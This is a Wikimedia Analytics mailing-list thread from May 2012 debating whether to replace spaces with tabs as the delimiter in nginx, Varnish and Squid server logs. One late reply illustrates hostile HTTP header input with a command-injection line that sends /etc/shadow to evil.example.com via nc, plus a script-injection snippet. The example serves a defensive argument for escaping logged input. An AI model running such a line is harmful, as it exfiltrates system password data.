strongly suggest that we move away from the space as delimiter and
start
using the tab (\t) character. > > Eeek! I'm pretty sure that this will: > a) not really solve the problem. If the Varnish isn't escaping > spaces, what makes us think it's escaping tabs? Spaces, tabs and
any
> non-URL character in a URL needs to be escaped by > Varnish/nginx/Squid/whatever > b) we have a lot of software scattered all over the place
processing
> this stuff (much of which is outside the purview of this group), and > we're probably going to break at least some of it with this change. > > Regardless, we'll need to have a much wider conversation about such
a
> change than this group. > > Rob
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
There are more suggestions hanging in the air waiting to be shot down.
Character replacement in c is very cheap.
So why not feed Diederik's filter with tab delimited data, and export space delimited data?
The filter first replaces all (non delimiting) spaces by underscores, then replaces all (delimiting) tabs by spaces.
Simple, and downwards compatible.
Erik
From: analytics-bounces@lists.wikimedia.org [mailto:analytics-bounces@lists.wikimedia.org] On Behalf Of Diederik van Liere Sent: Thursday, May 10, 2012 3:57 PM To: analytics@lists.wikimedia.org Subject: Re: [Analytics] Using tab as delimiter instead of space in the log files
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best,
Diederik
I'd be cool with making this a flag to udp-filter, ja. I wouldn't want to turn it on by default, but totally cool with that.
On May 10, 2012, at 2:03 PM, Erik Zachte wrote:
There are more suggestions hanging in the air waiting to be shot down.
Character replacement in c is very cheap. So why not feed Diederik's filter with tab delimited data, and export space delimited data?
The filter first replaces all (non delimiting) spaces by underscores, then replaces all (delimiting) tabs by spaces.
Simple, and downwards compatible.
Erik
From: analytics-bounces@lists.wikimedia.org [mailto:analytics-bounces@lists.wikimedia.org] On Behalf Of Diederik van Liere Sent: Thursday, May 10, 2012 3:57 PM To: analytics@lists.wikimedia.org Subject: Re: [Analytics] Using tab as delimiter instead of space in the log files
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best, Diederik
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Hi Erik,
Yes it is downwards compatible but does not outweigh the drawbacks. It's not simple, as it creates a disconnect between the configuration of the server log and the actual output. In addition, it is not a future proof solution because we also want to stream the server log data to the analytics cluster and then we will be still stuck with the same problem (as streaming the data into the analytics cluster will not depend on the udp-filter software). We should apply a real solution not a monkey patch.
D
On Thu, May 10, 2012 at 2:03 PM, Erik Zachte ezachte@wikimedia.org wrote:
There are more suggestions hanging in the air waiting to be shot down.****
Character replacement in c is very cheap. ****
So why not feed Diederik's filter with tab delimited data, and export space delimited data?****
The filter first replaces all (non delimiting) spaces by underscores, then replaces all (delimiting) tabs by spaces.****
Simple, and downwards compatible.****
Erik****
*From:* analytics-bounces@lists.wikimedia.org [mailto: analytics-bounces@lists.wikimedia.org] *On Behalf Of *Diederik van Liere *Sent:* Thursday, May 10, 2012 3:57 PM *To:* analytics@lists.wikimedia.org *Subject:* Re: [Analytics] Using tab as delimiter instead of space in the log files****
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.****
Best,****
Diederik****
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Well, he's still suggesting we switch to tab as delimiter in sources. Same solution, but with the extra bonus of allowing udp-filter to give our downstream consumers what they currently expect.
On May 10, 2012, at 2:08 PM, Diederik van Liere wrote:
Hi Erik,
Yes it is downwards compatible but does not outweigh the drawbacks. It's not simple, as it creates a disconnect between the configuration of the server log and the actual output. In addition, it is not a future proof solution because we also want to stream the server log data to the analytics cluster and then we will be still stuck with the same problem (as streaming the data into the analytics cluster will not depend on the udp-filter software). We should apply a real solution not a monkey patch.
D
On Thu, May 10, 2012 at 2:03 PM, Erik Zachte ezachte@wikimedia.org wrote: There are more suggestions hanging in the air waiting to be shot down.
Character replacement in c is very cheap.
So why not feed Diederik's filter with tab delimited data, and export space delimited data?
The filter first replaces all (non delimiting) spaces by underscores, then replaces all (delimiting) tabs by spaces.
Simple, and downwards compatible.
Erik
From: analytics-bounces@lists.wikimedia.org [mailto:analytics-bounces@lists.wikimedia.org] On Behalf Of Diederik van Liere Sent: Thursday, May 10, 2012 3:57 PM To: analytics@lists.wikimedia.org Subject: Re: [Analytics] Using tab as delimiter instead of space in the log files
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best,
Diederik
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
I don't think charsub is all that complex or scary. However, I think substituting in _ is a really bad idea.
** Once you do this, you cannot undo it, because _ is a valid character in all fields[1]. **
And for some data, there's a huge difference. It may be obvious that "text/html;_charset_=_utf8" is "text/html; charset = utf8", but in the case of a client sending a URL that isn't properly URL-encoded, the meaning of the request is totally changed if you convert "http://wikimedia.org/ " (which should have been encoded by the sending client to "http://wikimedia.org/%20") to "http://wikimedia.org/_". But there's no inversion function: you don't know to if "http://wikimedia.org/_" is "http://wikimedia.org/ " or really, actually "http://wikimedia.org/_".
So the obvious next question is: why not escape them ourselves? Because now you need a string copy, as escaping isn't 1:1 in characters (" " becomes "\ " (or whatever), which is more than one character). This comes back to what I was asking before: is there any whitespace character that is escaped by all our log sources? (My suspicion is that either \r, \n, or \v is escaped by everyone.)
If we can't find a whitespace character, using a non-semantic control character (0x0-0x31) should work, but it's riskier as some downstream consumers might choke on non-printable characters. Still: the best option here, hands down, is Bell (\a 0x07). Most unix programs understand it but don't do anything scary with it, and it doesn't change the meaning of the string. (We might make random machines beep. I am okay with this.) Additionally, it doesn't match '\s' in PCRE, which some people might be using to split the output.
If for some reason Bell isn't acceptable, Form Feed (\f 0x0C) is probably our next-best option. Unfortunately, it matches '\s', and (heh) prints as six newlines. (But if you're printing our logs, god help you.) Using any of the rest is sketchy, though with some testing, the Device Control characters (0x11-0x14) might be okay.
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 -- "Many HTTP/1.1 header field values consist of words separated by LWS or special characters."
CHAR = <any US-ASCII character (octets 0-127)> CTL = <any US-ASCII control character (octets 0-31 + 127)> token = 1*<any CHAR except CTLs or separators> separators = "(" | ")" | "<" | ">" | "@" | "," | ";" | ":" | "" | <"> | "/" | "[" | "]" | "?" | "=" | "{" | "}" | SP | HT
See also: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14
-- David Schoonover dsc@wikimedia.org
On May 10, 2012, at 11:11 AM, Andrew Otto wrote:
Well, he's still suggesting we switch to tab as delimiter in sources. Same solution, but with the extra bonus of allowing udp-filter to give our downstream consumers what they currently expect.
On May 10, 2012, at 2:08 PM, Diederik van Liere wrote:
Hi Erik,
Yes it is downwards compatible but does not outweigh the drawbacks. It's not simple, as it creates a disconnect between the configuration of the server log and the actual output. In addition, it is not a future proof solution because we also want to stream the server log data to the analytics cluster and then we will be still stuck with the same problem (as streaming the data into the analytics cluster will not depend on the udp-filter software). We should apply a real solution not a monkey patch.
D
On Thu, May 10, 2012 at 2:03 PM, Erik Zachte ezachte@wikimedia.org wrote: There are more suggestions hanging in the air waiting to be shot down.
Character replacement in c is very cheap.
So why not feed Diederik's filter with tab delimited data, and export space delimited data?
The filter first replaces all (non delimiting) spaces by underscores, then replaces all (delimiting) tabs by spaces.
Simple, and downwards compatible.
Erik
From: analytics-bounces@lists.wikimedia.org [mailto:analytics-bounces@lists.wikimedia.org] On Behalf Of Diederik van Liere Sent: Thursday, May 10, 2012 3:57 PM To: analytics@lists.wikimedia.org Subject: Re: [Analytics] Using tab as delimiter instead of space in the log files
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best,
Diederik
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Guys, this is turning into a complete bike-shed discussion.
I suggest the following: 1) We move to the tab character as delimiter, this not 100% accurate but will cause way way way fewer issues than space 2) We will extensively test this in the Labs environment where we have nginx/varnish/squid running 3) We will notify all log consumers before hand, about 2 weeks notice. 4) We will give Erik Zachte ample time to adjust and we supply him test data. The two weeks notice starts as soon as Erik has given thumbs up.
How does that sound?
Best, Diederik
On Thu, May 10, 2012 at 2:50 PM, David Schoonover dsc@wikimedia.org wrote:
I don't think charsub is all that complex or scary. However, I think substituting in _ is a really bad idea.
** Once you do this, you cannot undo it, because _ is a valid character in all fields[1]. **
And for some data, there's a huge difference. It may be obvious that "text/html;_charset_=_utf8" is "text/html; charset = utf8", but in the case of a client sending a URL that isn't properly URL-encoded, the meaning of the request is totally changed if you convert "http://wikimedia.org/ " (which should have been encoded by the sending client to " http://wikimedia.org/%20") to "http://wikimedia.org/_". But there's no inversion function: you don't know to if "http://wikimedia.org/_" is " http://wikimedia.org/ " or really, actually "http://wikimedia.org/_".
So the obvious next question is: why not escape them ourselves? Because now you need a string copy, as escaping isn't 1:1 in characters (" " becomes "\ " (or whatever), which is more than one character). This comes back to what I was asking before: is there any whitespace character that is escaped by all our log sources? (My suspicion is that either \r, \n, or \v is escaped by everyone.)
If we can't find a whitespace character, using a non-semantic control character (0x0-0x31) should work, but it's riskier as some downstream consumers might choke on non-printable characters. Still: the best option here, hands down, is Bell (\a 0x07). Most unix programs understand it but don't do anything scary with it, and it doesn't change the meaning of the string. (We might make random machines beep. I am okay with this.) Additionally, it doesn't match '\s' in PCRE, which some people might be using to split the output.
If for some reason Bell isn't acceptable, Form Feed (\f 0x0C) is probably our next-best option. Unfortunately, it matches '\s', and (heh) prints as six newlines. (But if you're printing our logs, god help you.) Using any of the rest is sketchy, though with some testing, the Device Control characters (0x11-0x14) might be okay.
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 -- "Many HTTP/1.1 header field values consist of words separated by LWS or special characters."
CHAR = <any US-ASCII character (octets 0-127)> CTL = <any US-ASCII control character (octets 0-31 + 127)> token = 1*<any CHAR except CTLs or separators> separators = "(" | ")" | "<" | ">" | "@" | "," | ";" | ":" | "\" | <"> | "/" | "[" | "]" | "?" | "=" | "{" | "}" | SP | HT
See also: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14
-- David Schoonover dsc@wikimedia.org
On May 10, 2012, at 11:11 AM, Andrew Otto wrote:
Well, he's still suggesting we switch to tab as delimiter in sources.
Same solution, but with the extra bonus of allowing udp-filter to give our downstream consumers what they currently expect.
On May 10, 2012, at 2:08 PM, Diederik van Liere wrote:
Hi Erik,
Yes it is downwards compatible but does not outweigh the drawbacks.
It's not simple, as it creates a disconnect between the configuration of the server log and the actual output. In addition, it is not a future proof solution because we also want to stream the server log data to the analytics cluster and then we will be still stuck with the same problem (as streaming the data into the analytics cluster will not depend on the udp-filter software). We should apply a real solution not a monkey patch.
D
On Thu, May 10, 2012 at 2:03 PM, Erik Zachte ezachte@wikimedia.org
wrote:
There are more suggestions hanging in the air waiting to be shot down.
Character replacement in c is very cheap.
So why not feed Diederik's filter with tab delimited data, and export
space delimited data?
The filter first replaces all (non delimiting) spaces by underscores,
then replaces all (delimiting) tabs by spaces.
Simple, and downwards compatible.
Erik
From: analytics-bounces@lists.wikimedia.org [mailto:
analytics-bounces@lists.wikimedia.org] On Behalf Of Diederik van Liere
Sent: Thursday, May 10, 2012 3:57 PM To: analytics@lists.wikimedia.org Subject: Re: [Analytics] Using tab as delimiter instead of space in the
log files
So far nobody has responded to my inquiry on whether they would be
affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best,
Diederik
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Also, the spaces -> _, tabs -> spaces underscore might be cool (or using whatever characters dsc suggests), but we don't have to think about that right now. That would be an add on to udp-filter, and Erik said in a previous email that he wouldn't mind changing to split("\t").
So. spaces -> tabs it is. :)
On May 10, 2012, at 2:54 PM, Diederik van Liere wrote:
Guys, this is turning into a complete bike-shed discussion.
I suggest the following:
- We move to the tab character as delimiter, this not 100% accurate but will cause way way way fewer issues than space
- We will extensively test this in the Labs environment where we have nginx/varnish/squid running
- We will notify all log consumers before hand, about 2 weeks notice.
- We will give Erik Zachte ample time to adjust and we supply him test data. The two weeks notice starts as soon as Erik has given thumbs up.
How does that sound?
Best, Diederik
On Thu, May 10, 2012 at 2:50 PM, David Schoonover dsc@wikimedia.org wrote: I don't think charsub is all that complex or scary. However, I think substituting in _ is a really bad idea.
** Once you do this, you cannot undo it, because _ is a valid character in all fields[1]. **
And for some data, there's a huge difference. It may be obvious that "text/html;_charset_=_utf8" is "text/html; charset = utf8", but in the case of a client sending a URL that isn't properly URL-encoded, the meaning of the request is totally changed if you convert "http://wikimedia.org/ " (which should have been encoded by the sending client to "http://wikimedia.org/%20") to "http://wikimedia.org/_". But there's no inversion function: you don't know to if "http://wikimedia.org/_" is "http://wikimedia.org/ " or really, actually "http://wikimedia.org/_".
So the obvious next question is: why not escape them ourselves? Because now you need a string copy, as escaping isn't 1:1 in characters (" " becomes "\ " (or whatever), which is more than one character). This comes back to what I was asking before: is there any whitespace character that is escaped by all our log sources? (My suspicion is that either \r, \n, or \v is escaped by everyone.)
If we can't find a whitespace character, using a non-semantic control character (0x0-0x31) should work, but it's riskier as some downstream consumers might choke on non-printable characters. Still: the best option here, hands down, is Bell (\a 0x07). Most unix programs understand it but don't do anything scary with it, and it doesn't change the meaning of the string. (We might make random machines beep. I am okay with this.) Additionally, it doesn't match '\s' in PCRE, which some people might be using to split the output.
If for some reason Bell isn't acceptable, Form Feed (\f 0x0C) is probably our next-best option. Unfortunately, it matches '\s', and (heh) prints as six newlines. (But if you're printing our logs, god help you.) Using any of the rest is sketchy, though with some testing, the Device Control characters (0x11-0x14) might be okay.
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 -- "Many HTTP/1.1 header field values consist of words separated by LWS or special characters."
CHAR = <any US-ASCII character (octets 0-127)> CTL = <any US-ASCII control character (octets 0-31 + 127)> token = 1*<any CHAR except CTLs or separators> separators = "(" | ")" | "<" | ">" | "@" | "," | ";" | ":" | "\" | <"> | "/" | "[" | "]" | "?" | "=" | "{" | "}" | SP | HT
See also: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14
-- David Schoonover dsc@wikimedia.org
On May 10, 2012, at 11:11 AM, Andrew Otto wrote:
Well, he's still suggesting we switch to tab as delimiter in sources. Same solution, but with the extra bonus of allowing udp-filter to give our downstream consumers what they currently expect.
On May 10, 2012, at 2:08 PM, Diederik van Liere wrote:
Hi Erik,
Yes it is downwards compatible but does not outweigh the drawbacks. It's not simple, as it creates a disconnect between the configuration of the server log and the actual output. In addition, it is not a future proof solution because we also want to stream the server log data to the analytics cluster and then we will be still stuck with the same problem (as streaming the data into the analytics cluster will not depend on the udp-filter software). We should apply a real solution not a monkey patch.
D
On Thu, May 10, 2012 at 2:03 PM, Erik Zachte ezachte@wikimedia.org wrote: There are more suggestions hanging in the air waiting to be shot down.
Character replacement in c is very cheap.
So why not feed Diederik's filter with tab delimited data, and export space delimited data?
The filter first replaces all (non delimiting) spaces by underscores, then replaces all (delimiting) tabs by spaces.
Simple, and downwards compatible.
Erik
From: analytics-bounces@lists.wikimedia.org [mailto:analytics-bounces@lists.wikimedia.org] On Behalf Of Diederik van Liere Sent: Thursday, May 10, 2012 3:57 PM To: analytics@lists.wikimedia.org Subject: Re: [Analytics] Using tab as delimiter instead of space in the log files
So far nobody has responded to my inquiry on whether they would be affected by this chance. So please let us know if you are consuming a server log and you are expecting spaces as delimiters. We want to make sure that we are aware of all the people that will be affected by this.
Best,
Diederik
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Analytics mailing list Analytics@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/analytics
Diederik just asked me to check if I could reproduce the problem of spaces in logs for a request like this: https://en.m.wikipedia.org/wiki/Extensor_carpi radialis longus
Answer: nginx does not escape the spaces in the url.
But don't blame nginx! nginx is just being honest! The HTTP header had spaces in it, so it printed the spaces to the log file. I think nginx did exactly what it was supposed to. As David pointed out, it is allowed to have any whitespace (even newlines) in an HTTP header. Shouldn't the loggers just output what they see?
Using tabs as the delimiter wouldn't solve the problem for ALL cases. It is possible to put tabs in headers, (right?). But for 99.999999% (that is a statistically researched number, don't question it) of cases, using tabs as delimiter would solve this problem.
On May 9, 2012, at 4:40 PM, Andrew Otto wrote:
(Moving this to analytics list, cause uhhh, why not?)
Ok some more info!
I was testing some of my changes to udp-filter on my test labs instance, and hey! whadyaknow! The test failed. One of the failures was due to the content type field not matching correctly. It looked like this: text/html; charset=UTF-8 And actually, my test didn't catch the charset portion of this, my regexp is matching via whitespace. It was the semi-colon in the text/html string that caused the test to fail.
I started sleuthing, and determined that this only shows up in my logs if I am hitting mediawiki pages. I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset.
So I'm pretty sure the setting of the value of this header is coming directly from Mediawiki. But, that isn't really our issue. Headers are allowed to have spaces in the values.
Here's some example log output with spaces in headers. https://gist.github.com/2648312
Summary: Nginx:
- Does not escape spaces in Content-Type
- Does not escape spaces in Accept-Language
- Does not escape spaces in any header (afaict*).
Varnish:
- Does not escape space in Content-Type
- Escapes spaces in Accept-Langage
- Escapes spaces in any header (afaict).
Squid: ~ Removes charset from Content-Type header (?)
- Escapes spaces in Accept-Language.
- Escapes spaces in any header (afaict).
The remaining question we need to answer: Do we want to patch source code for these guys in order to fix this problem? I'd rather not if we don't have to. Do we have to? Uhhh, dunno!
-Ao
*As Far As I Can Tell
On May 9, 2012, at 11:42 AM, Erik Zachte wrote:
For scripts it makes no difference: split("\t") is fine
For browsing lines in an editor: I can disable tab expansion (or pipe to sed first)
For human readability of pasted log lines in e.g. mail, it's no big deal (just slightly more ambiguous than a printable char)
So, I'm fine which whatever works best, inter-process wise.
Downward compatibility is another issue, but subscribers to our logs could get tabs replaced by blanks before data are forwarded. Anyway please don't change this overnight.
--
*KISS*
Then again. Diederiks filter could easily and cheaply change all spaces to underscores, then all tabs to spaces, and no-one would even have to think twice, or make any changes.
Erik
From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:59 PM To: Andrew Otto Cc: Erik Zachte; Rob Lanphier Subject: Re: Using tab as delimiter instead of space in the log files
Even I thought 12 months ago, "how hard can it be to use spaces only as delimiters" in a server log line. And 12 months later I now *know* it is extremely hard and those spaces will keep coming back, and we will keep discarding those log lines because they do not match the expected number of fields. Right now, these space issues are giving me headaches to come up with reasonable WikipediaMobile app usage for the Mobile team.
But think a couple of months ahead when we want to stream our data into the cluster, do we really want a gazillion if else if statements to make sure that the data is in the right format before we store in the cluster? This will create a huge performance problem.
By keep fixing spaces we will always behind the facts, because it takes a while before we discover the issue, and then we need to make changes to the config and get it approved or we fix it for once and for all.
Because the user agent info is freeform I think it's safest to go with a tab control character but I am open for other suggestions.
Best, D
On Wed, May 9, 2012 at 9:40 AM, Andrew Otto otto@wikimedia.org wrote:
we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
If so ja, could be a problem. How widespread is this? We'd like to keep track of these uses going forward.
Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever
the source can be located within hours and patched.
I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces.
Diederik, I agree. If we can figure out how to always escape things properly in the log format config directives for each log source (nginx,squid,varnishncsa), then no problem. But patching and recompiling every time we find a new edge case like this would be really annoying and kinda dangerous. The more changes we make to upstream sources the more we have to remember to maintain and the more bug prone we make crucial software.
Hmm, if we can figure out how to patch each of theses sources only once to make all whitespace characters in log fields escaped, then that might be ok. Mayyyybe, I dunno. What if we add a new source? Then we'd have to figure out how to patch it too.
is there any printable char that could be used?
Technically I'm sure we could find one, but I think we'd have more complaints about readability in emails and editors if we don't use whitespace than if we just used a tab.
What if we used multiple spaces (2? 4? 5?) as a delimiter? I'm not sure all the log format config directives would allow us to, but this might be less prone to editor weirdness, and also might cause problems for fewer users. Then they can split(' '). Although, hm, I guess that isn't much better than split("\t"), eh?
-A
On May 9, 2012, at 9:21 AM, Diederik van Liere wrote:
The tab would be inserted by varnish/squid/nginx when writing the log, we don't need to worry about URL transport or anything like that. We keep running into new cases where spaces show up where we don't expect them, and I really don't think we should start patching server software (like we did with nginx user agent string) to replace spaces. That locks us into specific versions of the software and the alternative is easy and robust.
Erik: I don't think that editor settings are a convincing argument against the use of tabs.
I am going to send this proposal to Wikitech mailing list.
D On 2012-05-09, at 7:29 AM, Erik Zachte wrote:
I'm not strongly pro or con but here are some thoughts:
I always get confused by tabs as they will be presented differently depending on editor settings (and different editors have different defaults). If someone pastes some log lines in an email, tabs might already have been expanded.
Also Diederik's new filter will validate the line, and count fields. If it signals invalid lines, the source can be located within hours and patched. How many sources could there be? We have 3 streams? In theory I am in favor of validating at the earliest point.
--
I know this is tricky, but if we decide to change, is there any printable char that could be used?
There are some characters that are out-of-bounds for urls, but some of those are unsafe for other reasons http://www.ietf.org/rfc/rfc1738.txt 2.2 section par. 'unsafe:'
<quote> Other characters are unsafe because gateways and other transport agents are known to sometimes modify such characters. These characters are "{", "}", "|", "\", "^", "~", "[", "]", and "`". <unquote>
One that comes to mind, but may have other quirks is 127/7F/
Another 2 cents. Erik
-----Original Message----- From: Diederik van Liere [mailto:dvanliere@wikimedia.org] Sent: Wednesday, May 09, 2012 3:33 AM To: Rob Lanphier Cc: Andrew Otto; Erik Zachte Subject: Re: Using tab as delimiter instead of space in the log files
a) Not sure why this wouldn't solve the problem, the problem is that we consistently are encountering spaces in fields while we are also using space as delimiter. By changing the delimiter we are no longer affected by spaces in the fields. Varnish does not need to escape tabs, those tabs are configured in the varnish/squid/nginx config files. Andrew, can you confirm this?
b) Who else is consuming the log files besides the analytics team and Erik Zachte? And changing to a tab as delimiter is going to be a small change, so yes it needs to be communicated to the people who consume these log files but not fixing it or alternative writing all kinds of patches seems a worse solution.
My 2 cents. D
On 2012-05-08, at 9:25 PM, Rob Lanphier wrote:
On Tue, May 8, 2012 at 6:06 PM, Diederik van Liere dvanliere@wikimedia.org wrote:
Instead of continuing patching our servers to fix these spaces issues I
strongly suggest that we move away from the space as delimiter and start using the tab (\t) character.
Eeek! I'm pretty sure that this will: a) not really solve the problem. If the Varnish isn't escaping spaces, what makes us think it's escaping tabs? Spaces, tabs and any non-URL character in a URL needs to be escaped by Varnish/nginx/Squid/whatever b) we have a lot of software scattered all over the place processing this stuff (much of which is outside the purview of this group), and we're probably going to break at least some of it with this change.
Regardless, we'll need to have a much wider conversation about such a change than this group.
Rob
On Thu, May 10, 2012 at 7:57 AM, Andrew Otto otto@wikimedia.org wrote:
Diederik just asked me to check if I could reproduce the problem of spaces in logs for a request like this: https://en.m.wikipedia.org/wiki/Extensor_carpi%C2%A0radialis longus
Answer: nginx does not escape the spaces in the url.
But don't blame nginx! nginx is just being honest! The HTTP header had spaces in it, so it printed the spaces to the log file. I think nginx did exactly what it was supposed to. As David pointed out, it is allowed to have any whitespace (even newlines) in an HTTP header. Shouldn't the loggers just output what they see?
No, nginx should print that output in a context-appropriate fashion. Fun possible http header fields: " ; cat /etc/shadow | nc evil.example.com 80 <javascript>alert('whee!');</javascript>
Now, that's not to say that it's likely that we have vulnerabilities in these areas. However, context matters, and printing spaces in a space-delimited file is ...um... suboptimal.
It looks like the default for nginx is space-delimited, but to put quote marks around user input: http://wiki.nginx.org/HttpLogModule
...which is a pretty fragile strategy (though perhaps less fragile than not putting quote marks as we do).
I agree with Andrew that we shouldn't maintain a patched version of nginx logging code. However, if we submitted a patch for optionally escaping spaces in header fields, it seems pretty plausible that it'd be accepted.
Using tabs as the delimiter wouldn't solve the problem for ALL cases. It is possible to put tabs in headers, (right?). But for 99.999999% (that is a statistically researched number, don't question it) of cases, using tabs as delimiter would solve this problem.
I suppose this would be fine. I would recommend, though, making sure we contact everyone listed as contacts in the filters list on locke, emery, and oxygen.
Rob